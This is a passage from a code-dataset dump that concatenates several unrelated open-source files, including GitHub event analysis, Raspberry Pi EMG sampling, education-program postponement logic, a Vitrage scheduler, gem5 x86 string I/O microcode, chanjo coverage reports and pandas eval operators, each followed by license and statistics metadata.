'repo.name' : '%s/%s' % (self.username, COURSE_REPO_NAME),
'type' : 'IssuesEvent',
'payload.action': 'closed',
})
on_other_repos = db.events.find({
'actor.login' : self.username,
'repo.name' : {'$nin' : [COURSE_REPO, '%s/%s' % (self.username, COURSE_REPO_NAME)]},
'type' : 'IssuesEvent',
'payload.action': 'closed',
})
#store the data
self.issues_resolved = {}
self.issues_resolved['on_course_repo'] = {
'count' : on_course_repo.count(),
'repos' : on_course_repo.distinct('repo.name'),
}
self.issues_resolved['on_course_repo_fork'] = {
'count' : on_course_repo_fork.count(),
'repos' : on_course_repo_fork.distinct('repo.name'),
}
self.issues_resolved['on_other_repos'] = {
'count' : on_other_repos.count(),
'repos' : on_other_repos.distinct('repo.name'),
}
return self.issues_resolved
#TODO: Actually ensure that the repos are not FORKS!
def get_repositories_created(self):
'''
get the details of any repositories that were created by the user
which are NOT forks (as they are already covered by get_forks_created)
1. repos created before the course started
2. repos created after the course ended
'''
#get data
db = connect()
repos_created = db.events.find({
'actor.login' : self.username,
'type' : 'CreateEvent',
'payload.ref_type' : 'repository',
})
#store data
self.repositories_created = {}
self.repositories_created = {
'count' : repos_created.count(),
'repos' : repos_created.distinct('repo.name')
}
return self.repositories_created
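# Minimal usage sketch: assumes a MongoDB populated with GitHub events and
# reachable through store.connect(), a valid COURSE_REPO in settings, and
# 'octocat' standing in for a real GitHub username.
if __name__ == '__main__':
    info = GitHubEventsInfo('octocat')
    print(info.get_commits_made())
    print(info.get_pull_requests_made())
    print(info.get_forks_created())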
| gpl-2.0 | 2,656,363,513,471,674,000 | 34.972881 | 163 | 0.516773 | false |
bwc126/MLND-Subvocal | pcf8591read.py | 1 | 1785 | #! /usr/bin/env python3
"""
This file is for gathering EMG data using the Q2W I2C PCF8591 ADC Breakout Board with a Raspberry PI. It's best used in conjunction with a script to control recording flow. See "simple_svr.py" for the actual control flow used.
"""
import csv
import sys, time
from quick2wire.parts.pcf8591 import *
from quick2wire.i2c import I2CMaster
#from vis import volt_plot
from writefile import *
from tkinter import *
class adc_reader():
def __init__(self):
self.address = int(sys.argv[1]) if len(sys.argv) > 1 else BASE_ADDRESS
self.pin_index1 = int(sys.argv[2]) if len(sys.argv) > 2 else 0
self.pin_index2 = int(sys.argv[3]) if len(sys.argv) > 3 else 1
self.record = False
def run(self, filename):
with I2CMaster() as i2c:
adc = PCF8591(i2c, THREE_DIFFERENTIAL)
pin1 = adc.differential_input(1)
count = 0
start = time.time()
with open(filename, 'w') as csvfile:
fieldnames = ['time', 'count', 'voltage']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
while self.record:
reading = ''
voltage = pin1.value * 3.3
strength = ['-' for i in range(int(pin1.value*256))]
disp = ''
for dash in strength:
disp += dash
print (disp)
#sleep(0.1)
count += 1
current = time.time() - start
#data[count] = pin1.raw_value
#volt_plot(count, data)
writer.writerow({'time': current, 'count': count, 'voltage': voltage})
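# Minimal control-flow sketch, following the docstring above: "simple_svr.py"
# is the real driver. The filename is an example, and `record` would normally
# be cleared again by the controlling script to stop the loop.
if __name__ == "__main__":
    reader = adc_reader()
    reader.record = True
    reader.run("emg_capture.csv")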
| mit | 6,554,003,415,954,009,000 | 34.7 | 227 | 0.538375 | false |
uclouvain/osis | education_group/ddd/domain/service/postpone_group.py | 1 | 3713 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2020 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from typing import Dict, List
from base.models.authorized_relationship import AuthorizedRelationshipList
from education_group.calendar.education_group_switch_calendar import EducationGroupSwitchCalendar
from education_group.ddd import command
from education_group.ddd.domain.exception import GroupCopyConsistencyException
from education_group.ddd.domain.group import Group
from education_group.ddd.domain.service.conflicted_fields import Year, FieldLabel
from osis_common.ddd import interface
from osis_common.ddd.interface import ApplicationService
from program_management.ddd.domain.service.calculate_end_postponement import CalculateEndPostponement
class PostponeOrphanGroup(interface.DomainService):
@classmethod
def postpone(
cls,
updated_group: 'Group',
conflicted_fields: Dict[Year, List[FieldLabel]],
end_postponement_calculator: 'CalculateEndPostponement',
copy_group_service: ApplicationService,
authorized_relationships: 'AuthorizedRelationshipList',
calendar: 'EducationGroupSwitchCalendar'
):
identities = []
closest_working_year = min(calendar.get_target_years_opened())
is_in_past = updated_group.year < closest_working_year
if not is_in_past and authorized_relationships.is_mandatory_child_type(updated_group.type):
# means that this group has been automatically created by the system
# behind 'trainings' and 'minitrainings' Nodes/groups in ProgramTree
end_postponement_year = end_postponement_calculator.calculate_end_postponement_year_for_orphan_group(
group=updated_group
)
for year in range(updated_group.year, end_postponement_year):
if year + 1 in conflicted_fields:
break # Do not copy info from year to N+1 because conflict detected
identity_next_year = copy_group_service(
command.CopyGroupCommand(
from_code=updated_group.code,
from_year=year
)
)
identities.append(identity_next_year)
if conflicted_fields:
first_conflict_year = min(conflicted_fields.keys())
raise GroupCopyConsistencyException(first_conflict_year, conflicted_fields[first_conflict_year])
return identities
| agpl-3.0 | -980,645,893,848,153,000 | 49.849315 | 113 | 0.66945 | false |
botswana-harvard/edc-call-manager | edc_call_manager/mixins.py | 1 | 1561 | from django.apps import apps as django_apps
from django.core.exceptions import MultipleObjectsReturned
from django.db import models
app_config = django_apps.get_app_config('edc_call_manager')
class CallLogLocatorMixin(models.Model):
"""A Locator model mixin that has the Locator model update the Log if changed."""
def save(self, *args, **kwargs):
self.update_call_log()
super(CallLogLocatorMixin, self).save(*args, **kwargs)
def get_call_log_model(self):
"""If using the edc_call_manager, return the Log model so it can be updated."""
try:
return django_apps.get_model(app_config.label, 'log')
except LookupError:
return None
def get_call_log_options(self):
"""If using the edc_call_manager, return the Log model filter options."""
return dict(call__registered_subject=self.registered_subject)
def update_call_log(self):
"""If using the edc_call_manager, update the Log model otherwise do nothing."""
Log = self.get_call_log_model()
if Log:
try:
log = Log.objects.get(**self.get_call_log_options())
log.locator_information = self.to_string()
log.save()
except MultipleObjectsReturned:
for log in Log.objects.filter(**self.get_call_log_options()):
log.locator_information = self.to_string()
log.save()
except Log.DoesNotExist:
pass
class Meta:
abstract = True
| gpl-2.0 | -4,849,253,839,757,369,000 | 35.302326 | 87 | 0.61499 | false |
vicenteneto/PyRESTEasy | tests/helpers/clients.py | 1 | 1153 | import rest_easy
from rest_easy import get, path
@get()
def test_get():
pass
@path('path')
def test_path():
pass
class ClientAsObject(object):
@get()
def test_get(self):
pass
class ClientWithoutTarget(rest_easy.Client):
@get()
def test_get(self):
pass
class GetClient(rest_easy.Client):
_target = 'http://www.google.com/'
@get()
def test_get_without_define_kwargs(self):
pass
@get()
def test_get_with_named_arguments(self, first_param=None, second_param=None):
pass
@get()
def test_get_with_default_arguments(self, first_param='first', second_param=None):
pass
@get()
def test_get_with_non_valid_default_arguments(self, first_param=object(), second_param=None):
pass
@get()
def test_get(self, **kwargs):
pass
@get()
@path('path')
def test_get_before_another_decorator(self):
pass
class PathClient(rest_easy.Client):
_target = 'http://www.google.com'
@path('path')
def test_path_without_get(self):
pass
@path('path')
@get()
def test_path(self):
pass
| mit | -1,962,198,361,716,257,300 | 16.469697 | 97 | 0.597572 | false |
ucsd-ccbb/Oncolist | src/server/TCGA/IDAppender.py | 1 | 5654 | __author__ = 'guorongxu'
import os
import sys
## To process JSON files and append an id for each document.
def process_louvain_cluster_json(workspace, data_set):
root_json_dir = workspace + "/" + data_set + "/louvain_json_files"
    ## id number rule:
    # the first digit "2" is the cluster index id;
    # the next two digits "02" are the TCGA louvain cluster type id;
    # the last seven digits "0000000" are the running id.
id_num = 2020000000
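    # Illustrative decomposition of a hypothetical id, 2020000123:
    #   cluster index "2", type "02" (TCGA louvain cluster), running id "0000123".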
for dirpath, directories, filenames in os.walk(root_json_dir):
for filename in filenames:
if filename.find(".json") > -1 and filename.find("gamma") > -1:
input_file = os.path.join(dirpath, filename)
output_file = input_file.replace(".json", ".json.new")
if not os.path.exists(output_file):
filewriter = open(output_file, "a")
with open(input_file) as fp:
lines = fp.readlines()
for line in lines:
if line.startswith("curl -XPOST"):
filewriter.write(line.replace(" -d", "/" + str(id_num) + " -d"))
id_num = id_num + 1
else:
filewriter.write(line)
fp.closed
filewriter.close()
## To process JSON files and append an id for each document.
def process_ivanovska_cluster_json(workspace, data_set):
root_json_dir = workspace + "/" + data_set + "/ivanovska_json_files"
    ## id number rule:
    # the first digit "2" is the cluster index id;
    # the next two digits "03" are the TCGA ivanovska cluster type id;
    # the last seven digits "0000000" are the running id.
id_num = 2030000000
for dirpath, directories, filenames in os.walk(root_json_dir):
for filename in filenames:
if filename.find(".json") > -1 and filename.find("gamma") > -1:
input_file = os.path.join(dirpath, filename)
output_file = input_file.replace(".json", ".json.new")
if not os.path.exists(output_file):
filewriter = open(output_file, "a")
with open(input_file) as fp:
lines = fp.readlines()
for line in lines:
if line.startswith("curl -XPOST"):
filewriter.write(line.replace(" -d", "/" + str(id_num) + " -d"))
id_num = id_num + 1
else:
filewriter.write(line)
fp.closed
filewriter.close()
## To process JSON files and append an id for each document.
def process_oslom_cluster_json(workspace, data_set):
root_json_dir = workspace + "/" + data_set + "/oslom_undirected_json_files"
    ## id number rule:
    # the first digit "2" is the cluster index id;
    # the next two digits "04" are the TCGA oslom cluster type id;
    # the last seven digits "0000000" are the running id.
id_num = 2040000000
for dirpath, directories, filenames in os.walk(root_json_dir):
for filename in filenames:
if filename.find(".json") > -1 and filename.find("gamma") > -1:
input_file = os.path.join(dirpath, filename)
output_file = input_file.replace(".json", ".json.new")
if not os.path.exists(output_file):
filewriter = open(output_file, "a")
with open(input_file) as fp:
lines = fp.readlines()
for line in lines:
if line.startswith("curl -XPOST"):
filewriter.write(line.replace(" -d", "/" + str(id_num) + " -d"))
id_num = id_num + 1
else:
filewriter.write(line)
fp.closed
filewriter.close()
## To process JSON files and append an id for each document.
def process_star_json(workspace, data_set):
root_json_dir = workspace + "/" + data_set + "/json_files"
    ## id number rule:
    # the first digit "1" is the genes index id;
    # the next two digits "02" are the TCGA star type id;
    # the last seven digits "0000000" are the running id.
id_num = 1020000000
for dirpath, directories, filenames in os.walk(root_json_dir):
for filename in filenames:
if filename.find(".json") > -1 and filename.find("genes_tcga") > -1:
input_file = os.path.join(dirpath, filename)
output_file = input_file.replace(".json", ".json.new")
if not os.path.exists(output_file):
filewriter = open(output_file, "a")
with open(input_file) as fp:
lines = fp.readlines()
for line in lines:
if line.startswith("curl -XPOST"):
filewriter.write(line.replace(" -d", "/" + str(id_num) + " -d"))
id_num = id_num + 1
else:
filewriter.write(line)
fp.closed
filewriter.close()
## Main entry
if __name__ == "__main__":
workspace = sys.argv[1]
data_set = sys.argv[2]
#workspace = "/Users/guorongxu/Desktop/SearchEngine"
#data_set = "TCGA"
process_oslom_cluster_json(workspace, data_set)
#process_star_json(workspace, data_set)
| mit | -3,096,008,627,221,445,000 | 42.160305 | 96 | 0.514857 | false |
openstack/vitrage | vitrage/entity_graph/scheduler.py | 1 | 2977 | # Copyright 2018 - Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from concurrent.futures import ThreadPoolExecutor
from futurist import periodics
from oslo_config import cfg
from oslo_log import log
from vitrage.datasources import utils
from vitrage.common.constants import DatasourceAction
from vitrage.common.utils import spawn
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class Scheduler(object):
def __init__(self, graph, driver_exec, persist, consistency_enforcer):
super(Scheduler, self).__init__()
self.graph = graph
self.driver_exec = driver_exec
self.persist = persist
self.consistency = consistency_enforcer
self.periodic = None
def start_periodic_tasks(self, immediate_get_all):
thread_num = len(utils.get_pull_drivers_names())
thread_num += 2 # for consistency and get_all
self.periodic = periodics.PeriodicWorker.create(
[], executor_factory=lambda: ThreadPoolExecutor(
max_workers=thread_num))
self._add_consistency_timer()
self._add_datasource_timers(immediate_get_all)
spawn(self.periodic.start)
def _add_consistency_timer(self):
spacing = CONF.datasources.snapshots_interval
@periodics.periodic(spacing=spacing)
def consistency_periodic():
try:
self.consistency.periodic_process()
except Exception:
LOG.exception('run_consistency failed.')
self.periodic.add(consistency_periodic)
LOG.info("added consistency_periodic (spacing=%s)", spacing)
def _add_datasource_timers(self, run_immediately):
spacing = CONF.datasources.snapshots_interval
@periodics.periodic(spacing=spacing, run_immediately=run_immediately)
def get_all_periodic():
self.driver_exec.snapshot_get_all(DatasourceAction.SNAPSHOT)
self.periodic.add(get_all_periodic)
LOG.info("added get_all_periodic (spacing=%s)", spacing)
driver_names = utils.get_pull_drivers_names()
for d_name in driver_names:
spacing = CONF[d_name].changes_interval
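            # Note: d_name is bound through the default argument of the nested
            # function below, so each periodic closure keeps its own driver name
            # across loop iterations instead of sharing the last value.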
@periodics.periodic(spacing=spacing)
def get_changes_periodic(driver_name=d_name):
self.driver_exec.get_changes(driver_name)
self.periodic.add(get_changes_periodic)
LOG.info("added get_changes_periodic %s (spacing=%s)",
d_name, spacing)
| apache-2.0 | -1,596,756,444,141,159,000 | 34.86747 | 77 | 0.675512 | false |
robinandeer/chanjo-report | chanjo_report/server/blueprints/report/utils.py | 1 | 6697 | from __future__ import division
import itertools
import logging
from flask import abort, flash
from sqlalchemy.exc import OperationalError
from sqlalchemy import func
from chanjo.store.models import Transcript, TranscriptStat, Sample
from chanjo.sex import predict_sex
from chanjo_report.server.constants import LEVELS
from chanjo_report.server.extensions import api
LOG = logging.getLogger(__name__)
def transcript_coverage(api, gene_id, *sample_ids):
"""Return coverage metrics per transcript for a given gene."""
query = (api.query(TranscriptStat)
.join(TranscriptStat.transcript)
.filter(Transcript.gene_id == gene_id)
.order_by(TranscriptStat.transcript_id,
TranscriptStat.sample_id))
if sample_ids:
query = query.filter(TranscriptStat.sample_id.in_(sample_ids))
tx_groups = itertools.groupby(query, key=lambda tx: tx.transcript_id)
return tx_groups
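# Illustrative use of transcript_coverage (the gene and sample ids are hypothetical):
#   for tx_id, stats in transcript_coverage(api, 'ADK', 'sample_1', 'sample_2'):
#       for tx_stat in stats:
#           print(tx_id, tx_stat.sample_id, tx_stat.mean_coverage)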
def map_samples(group_id=None, sample_ids=None):
if group_id:
query = Sample.query.filter(Sample.group_id == group_id)
elif sample_ids:
query = Sample.query.filter(Sample.id.in_(sample_ids))
else:
query = Sample.query
try:
samples = {sample_obj.id: sample_obj for sample_obj in query}
return samples
except OperationalError as error:
LOG.exception(error)
api.session.rollback()
return abort(500, 'MySQL error, try again')
def samplesex_rows(sample_ids):
"""Generate sex prediction info rows."""
sex_query = (api.query(
TranscriptStat.sample_id,
Transcript.chromosome,
func.avg(TranscriptStat.mean_coverage)
).join(
TranscriptStat.transcript
).filter(
Transcript.chromosome.in_(['X', 'Y']),
TranscriptStat.sample_id.in_(sample_ids)
).group_by(
TranscriptStat.sample_id,
Transcript.chromosome
))
samples = itertools.groupby(sex_query, lambda row: row[0])
for sample_id, chromosomes in samples:
chr_coverage = [coverage for _, _, coverage in chromosomes]
LOG.debug('predicting sex')
predicted_sex = predict_sex(*chr_coverage)
sample_obj = Sample.query.get(sample_id)
sample_row = {
'sample': sample_obj.name or sample_obj.id,
'group': sample_obj.group_name,
'analysis_date': sample_obj.created_at,
'sex': predicted_sex,
'x_coverage': chr_coverage[0],
'y_coverage': chr_coverage[1],
}
yield sample_row
def keymetrics_rows(samples_ids, genes=None):
"""Generate key metrics rows."""
query = (
api.query(
TranscriptStat,
func.avg(TranscriptStat.mean_coverage).label('mean_coverage'),
func.avg(TranscriptStat.completeness_10).label('completeness_10'),
func.avg(TranscriptStat.completeness_15).label('completeness_15'),
func.avg(TranscriptStat.completeness_20).label('completeness_20'),
func.avg(TranscriptStat.completeness_50).label('completeness_50'),
func.avg(TranscriptStat.completeness_100).label('completeness_100'),
)
.filter(TranscriptStat.sample_id.in_(samples_ids))
.group_by(TranscriptStat.sample_id)
)
if genes:
query = (query.join(TranscriptStat.transcript)
.filter(Transcript.gene_id.in_(genes)))
return query
def transcripts_rows(sample_ids, genes=None, level=10):
"""Generate metrics rows for transcripts."""
for sample_id in sample_ids:
sample_obj = Sample.query.get(sample_id)
all_tx = TranscriptStat.query.filter_by(sample_id=sample_id)
if genes:
all_tx = (all_tx.join(TranscriptStat.transcript)
.filter(Transcript.gene_id.in_(genes)))
tx_count = all_tx.count()
stat_field = getattr(TranscriptStat, LEVELS[level])
missed_tx = all_tx.filter(stat_field < 100)
missed_count = missed_tx.count()
if tx_count == 0:
tx_yield = 0
flash("no matching transcripts found!")
else:
tx_yield = 100 - (missed_count / tx_count * 100)
yield {
'sample': sample_obj,
'yield': tx_yield,
'missed': missed_tx,
'missed_count': missed_count,
'total': tx_count,
}
def diagnostic_yield(api, genes=None, samples=None, group=None, level=10):
"""Calculate transcripts that aren't completely covered.
This metric only applies to one sample in isolation. Otherwise
it's hard to know what to do with exons that are covered or
not covered across multiple samples.
Args:
        api: chanjo store session used to run the queries
        genes (list, optional): restrict the metric to these gene ids
        samples (list, optional): restrict the metric to these sample ids
        group (str, optional): restrict the metric to samples in this group
        level (int): completeness cutoff level, e.g. 10 for completeness_10
"""
threshold = 100
str_level = "completeness_{}".format(level)
completeness_col = getattr(TranscriptStat, str_level)
all_tx = api.query(Transcript)
missed_tx = (api.query(TranscriptStat)
.filter(completeness_col < threshold)
.order_by(TranscriptStat.sample_id))
if genes:
missed_tx = (missed_tx.join(TranscriptStat.transcript)
.filter(Transcript.gene_id.in_(genes)))
all_tx = all_tx.filter(Transcript.gene_id.in_(genes))
samples_query = api.query(Sample.id)
if samples:
samples_query = samples_query.filter(Sample.id.in_(samples))
missed_tx = missed_tx.filter(TranscriptStat.sample_id.in_(samples))
elif group:
samples_query = samples_query.filter_by(group_id=group)
missed_tx = (missed_tx.join(TranscriptStat.sample).filter(Sample.group_id == group))
all_count = all_tx.count()
all_samples = [row[0] for row in samples_query.all()]
sample_groups = itertools.groupby(missed_tx, key=lambda tx: tx.sample_id)
missed_samples = {}
for sample_id, tx_models in sample_groups:
gene_ids = set()
tx_count = 0
for tx_model in tx_models:
gene_ids.add(tx_model.transcript.gene_id)
tx_count += 1
diagnostic_yield = 100 - (tx_count / all_count * 100)
result = {'sample_id': sample_id}
result['diagnostic_yield'] = diagnostic_yield
result['count'] = tx_count
result['total_count'] = all_count
result['genes'] = list(gene_ids)
missed_samples[sample_id] = result
for sample_id in all_samples:
if sample_id in missed_samples:
yield missed_samples[sample_id]
else:
# all transcripts are covered!
result = {'sample_id': sample_id, 'diagnostic_yield': 100}
yield result
| mit | 223,761,722,041,765,950 | 35.2 | 92 | 0.620427 | false |
liangwang/m5 | src/arch/x86/isa/insts/general_purpose/input_output/string_io.py | 1 | 4234 | # Copyright (c) 2007-2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop INS_M_R {
# Find the constant we need to either add or subtract from rdi
ruflag t0, 10
movi t3, t3, dsz, flags=(CEZF,), dataSize=asz
subi t4, t0, dsz, dataSize=asz
mov t3, t3, t4, flags=(nCEZF,), dataSize=asz
zexti t2, reg, 15, dataSize=8
ld t6, intseg, [1, t2, t0], "IntAddrPrefixIO << 3", addressSize=8
st t6, es, [1, t0, rdi]
add rdi, rdi, t3, dataSize=asz
};
def macroop INS_E_M_R {
and t0, rcx, rcx, flags=(EZF,), dataSize=asz
br label("end"), flags=(CEZF,)
# Find the constant we need to either add or subtract from rdi
ruflag t0, 10
movi t3, t3, dsz, flags=(CEZF,), dataSize=asz
subi t4, t0, dsz, dataSize=asz
mov t3, t3, t4, flags=(nCEZF,), dataSize=asz
zexti t2, reg, 15, dataSize=8
topOfLoop:
ld t6, intseg, [1, t2, t0], "IntAddrPrefixIO << 3", addressSize=8
st t6, es, [1, t0, rdi]
subi rcx, rcx, 1, flags=(EZF,), dataSize=asz
add rdi, rdi, t3, dataSize=asz
br label("topOfLoop"), flags=(nCEZF,)
end:
fault "NoFault"
};
def macroop OUTS_R_M {
# Find the constant we need to either add or subtract from rdi
ruflag t0, 10
movi t3, t3, dsz, flags=(CEZF,), dataSize=asz
subi t4, t0, dsz, dataSize=asz
mov t3, t3, t4, flags=(nCEZF,), dataSize=asz
zexti t2, reg, 15, dataSize=8
ld t6, ds, [1, t0, rsi]
st t6, intseg, [1, t2, t0], "IntAddrPrefixIO << 3", addressSize=8
add rsi, rsi, t3, dataSize=asz
};
def macroop OUTS_E_R_M {
and t0, rcx, rcx, flags=(EZF,), dataSize=asz
br label("end"), flags=(CEZF,)
# Find the constant we need to either add or subtract from rdi
ruflag t0, 10
movi t3, t3, dsz, flags=(CEZF,), dataSize=asz
subi t4, t0, dsz, dataSize=asz
mov t3, t3, t4, flags=(nCEZF,), dataSize=asz
zexti t2, reg, 15, dataSize=8
topOfLoop:
ld t6, ds, [1, t0, rsi]
st t6, intseg, [1, t2, t0], "IntAddrPrefixIO << 3", addressSize=8
subi rcx, rcx, 1, flags=(EZF,), dataSize=asz
add rsi, rsi, t3, dataSize=asz
br label("topOfLoop"), flags=(nCEZF,)
end:
fault "NoFault"
};
'''
| bsd-3-clause | -5,485,469,004,281,648,000 | 36.803571 | 72 | 0.705716 | false |
pjryan126/solid-start-careers | store/api/zillow/venv/lib/python2.7/site-packages/pandas/computation/ops.py | 1 | 15283 | """Operator classes for eval.
"""
import operator as op
from functools import partial
from datetime import datetime
import numpy as np
import pandas as pd
from pandas.compat import PY3, string_types, text_type
import pandas.core.common as com
import pandas.lib as lib
from pandas.core.base import StringMixin
from pandas.computation.common import _ensure_decoded, _result_type_many
from pandas.computation.scope import _DEFAULT_GLOBALS
_reductions = 'sum', 'prod'
_unary_math_ops = ('sin', 'cos', 'exp', 'log', 'expm1', 'log1p',
'sqrt', 'sinh', 'cosh', 'tanh', 'arcsin', 'arccos',
'arctan', 'arccosh', 'arcsinh', 'arctanh', 'abs')
_binary_math_ops = ('arctan2',)
_mathops = _unary_math_ops + _binary_math_ops
_LOCAL_TAG = '__pd_eval_local_'
class UndefinedVariableError(NameError):
"""NameError subclass for local variables."""
def __init__(self, name, is_local):
if is_local:
msg = 'local variable {0!r} is not defined'
else:
msg = 'name {0!r} is not defined'
super(UndefinedVariableError, self).__init__(msg.format(name))
class Term(StringMixin):
def __new__(cls, name, env, side=None, encoding=None):
klass = Constant if not isinstance(name, string_types) else cls
supr_new = super(Term, klass).__new__
return supr_new(klass)
def __init__(self, name, env, side=None, encoding=None):
self._name = name
self.env = env
self.side = side
tname = text_type(name)
self.is_local = (tname.startswith(_LOCAL_TAG) or
tname in _DEFAULT_GLOBALS)
self._value = self._resolve_name()
self.encoding = encoding
@property
def local_name(self):
return self.name.replace(_LOCAL_TAG, '')
def __unicode__(self):
return com.pprint_thing(self.name)
def __call__(self, *args, **kwargs):
return self.value
def evaluate(self, *args, **kwargs):
return self
def _resolve_name(self):
res = self.env.resolve(self.local_name, is_local=self.is_local)
self.update(res)
if hasattr(res, 'ndim') and res.ndim > 2:
raise NotImplementedError("N-dimensional objects, where N > 2,"
" are not supported with eval")
return res
def update(self, value):
"""
search order for local (i.e., @variable) variables:
scope, key_variable
[('locals', 'local_name'),
('globals', 'local_name'),
('locals', 'key'),
('globals', 'key')]
"""
key = self.name
# if it's a variable name (otherwise a constant)
if isinstance(key, string_types):
self.env.swapkey(self.local_name, key, new_value=value)
self.value = value
@property
def isscalar(self):
return lib.isscalar(self._value)
@property
def type(self):
try:
# potentially very slow for large, mixed dtype frames
return self._value.values.dtype
except AttributeError:
try:
# ndarray
return self._value.dtype
except AttributeError:
# scalar
return type(self._value)
return_type = type
@property
def raw(self):
return com.pprint_thing('{0}(name={1!r}, type={2})'
''.format(self.__class__.__name__, self.name,
self.type))
@property
def is_datetime(self):
try:
t = self.type.type
except AttributeError:
t = self.type
return issubclass(t, (datetime, np.datetime64))
@property
def value(self):
return self._value
@value.setter
def value(self, new_value):
self._value = new_value
@property
def name(self):
return self._name
@name.setter
def name(self, new_name):
self._name = new_name
@property
def ndim(self):
return self._value.ndim
class Constant(Term):
def __init__(self, value, env, side=None, encoding=None):
super(Constant, self).__init__(value, env, side=side,
encoding=encoding)
def _resolve_name(self):
return self._name
@property
def name(self):
return self.value
_bool_op_map = {'not': '~', 'and': '&', 'or': '|'}
class Op(StringMixin):
"""Hold an operator of arbitrary arity
"""
def __init__(self, op, operands, *args, **kwargs):
self.op = _bool_op_map.get(op, op)
self.operands = operands
self.encoding = kwargs.get('encoding', None)
def __iter__(self):
return iter(self.operands)
def __unicode__(self):
"""Print a generic n-ary operator and its operands using infix
notation"""
# recurse over the operands
parened = ('({0})'.format(com.pprint_thing(opr))
for opr in self.operands)
return com.pprint_thing(' {0} '.format(self.op).join(parened))
@property
def return_type(self):
# clobber types to bool if the op is a boolean operator
if self.op in (_cmp_ops_syms + _bool_ops_syms):
return np.bool_
return _result_type_many(*(term.type for term in com.flatten(self)))
@property
def has_invalid_return_type(self):
types = self.operand_types
obj_dtype_set = frozenset([np.dtype('object')])
return self.return_type == object and types - obj_dtype_set
@property
def operand_types(self):
return frozenset(term.type for term in com.flatten(self))
@property
def isscalar(self):
return all(operand.isscalar for operand in self.operands)
@property
def is_datetime(self):
try:
t = self.return_type.type
except AttributeError:
t = self.return_type
return issubclass(t, (datetime, np.datetime64))
def _in(x, y):
"""Compute the vectorized membership of ``x in y`` if possible, otherwise
use Python.
"""
try:
return x.isin(y)
except AttributeError:
if com.is_list_like(x):
try:
return y.isin(x)
except AttributeError:
pass
return x in y
def _not_in(x, y):
"""Compute the vectorized membership of ``x not in y`` if possible,
otherwise use Python.
"""
try:
return ~x.isin(y)
except AttributeError:
if com.is_list_like(x):
try:
return ~y.isin(x)
except AttributeError:
pass
return x not in y
_cmp_ops_syms = '>', '<', '>=', '<=', '==', '!=', 'in', 'not in'
_cmp_ops_funcs = op.gt, op.lt, op.ge, op.le, op.eq, op.ne, _in, _not_in
_cmp_ops_dict = dict(zip(_cmp_ops_syms, _cmp_ops_funcs))
_bool_ops_syms = '&', '|', 'and', 'or'
_bool_ops_funcs = op.and_, op.or_, op.and_, op.or_
_bool_ops_dict = dict(zip(_bool_ops_syms, _bool_ops_funcs))
_arith_ops_syms = '+', '-', '*', '/', '**', '//', '%'
_arith_ops_funcs = (op.add, op.sub, op.mul, op.truediv if PY3 else op.div,
op.pow, op.floordiv, op.mod)
_arith_ops_dict = dict(zip(_arith_ops_syms, _arith_ops_funcs))
_special_case_arith_ops_syms = '**', '//', '%'
_special_case_arith_ops_funcs = op.pow, op.floordiv, op.mod
_special_case_arith_ops_dict = dict(zip(_special_case_arith_ops_syms,
_special_case_arith_ops_funcs))
_binary_ops_dict = {}
for d in (_cmp_ops_dict, _bool_ops_dict, _arith_ops_dict):
_binary_ops_dict.update(d)
def _cast_inplace(terms, dtype):
"""Cast an expression inplace.
Parameters
----------
terms : Op
The expression that should cast.
dtype : str or numpy.dtype
The dtype to cast to.
"""
dt = np.dtype(dtype)
for term in terms:
try:
new_value = term.value.astype(dt)
except AttributeError:
new_value = dt.type(term.value)
term.update(new_value)
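# Illustrative: the Div operator below relies on this helper, e.g.
# _cast_inplace(com.flatten(binop), np.float_) casts every Term reachable from
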